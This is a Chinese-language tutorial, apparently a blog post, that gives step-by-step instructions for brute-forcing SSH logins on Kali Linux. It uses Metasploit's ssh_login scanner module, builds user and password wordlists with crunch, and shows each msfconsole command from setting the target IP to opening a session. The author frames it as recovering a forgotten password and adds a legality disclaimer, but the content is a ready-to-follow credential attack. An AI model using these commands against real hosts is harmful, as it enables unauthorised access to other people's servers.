不错今天更新就是暴力破解ssh,真对于自己忘记ssh密码了,就可以利用技术破解得到自己的密码。(xing的版权所有,该技术不可用非法途径!!!)话不多说上操作:
我现在这个是暴力破解ssh的一种方法:(我认为最简单的而且好用的) 用过kali的人都知道Metasploit Framework(简称MSF)是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,Shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。简称为“MSF模块控制台”;因为它的就不断的调用模块来做事情的,这个不理解没有关系的,这个不是很重要,你只要会用就行。(我就是简单介绍)
来咯!来咯!咱们开始; 第一步:打开kali的命令面板输入; msfconsole 等待几秒就好;你就会看到下面这个界面(这里每个人启动时出现画面会不一样,有时还有爱心送你哟!!!)。 ╭─root@xing ~ ╰─➤ msfconsole
第二步:这一步是重要的一步也是不可少的一步;调用模块来破解。 然后就开始输入命令调用: msf6 > use auxiliary/scanner/ssh/ssh_login msf6 auxiliary(scanner/ssh/ssh_login) > msf6 auxiliary(scanner/ssh/ssh_login) > 调用后模块会以红色跟在msf6 的后面. 如下图:看到这个你成功的调用了模块,可一进行下小步了。 可以输入:msf6 auxiliary(scanner/ssh/ssh_login) > show options 会看到有很多的参数出来还有说明(如图):上面这个两文件可以自己写出来(你要知道密码和用户的前提下)或者利用crunch字典生成器(这种就是不记得用户个密码了,只记得有什么字符存在),搞出来! 字典生成格式用法;字典生成命令用法; ╭─root@xing ~ ╰─➤ crunch 8 8 twx51678 -o /root/kali/passwd.txt //这是密码文件生成命令 ╭─root@xing ~ ╰─➤ crunch 4 4 tang -o /root/kali/userlist.txt //用户 这两个文件越大,破解时间越长哟!!!!这些准备好了就把参数来设置好: 第三步:设参数(ssh在这里的参数只需要设置三个就可一了:(用户,主机ip,密码文件));这三者缺一不可。 命令如下; msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.99 rhosts => 192.168.1.99 //这里设置要破解的ssh主机ip msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /root/kali/hao.txt USER_FILE => /root/kali/userlist.txt //用户文件 (我这里用的hao.txt) msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/kali/passwd.txt PASS_FILE => /root/kali/passwd.txt // 密码文件最后一步:就输入 run 或者 exploit 然后就开始破解。 msf6 auxiliary(scanner/ssh/ssh_login) > run 破解成功如图(会得到用户和密码);
既然都破解成功了,怎么就来测试一下看看可以ssh登录过去: 输入一下命令看看ssh对话信息: msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i看到Id之后就输入一下命令ssh登录过去: msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 2 //这个是在msf里面ssh过去会有点慢要耐心等待哟!!! 也可以直接利用破解出来的用户和密码去ssh登录看看;有不对的地方还望大佬们留言评论!!!觉得不错就》》》;谢谢!!!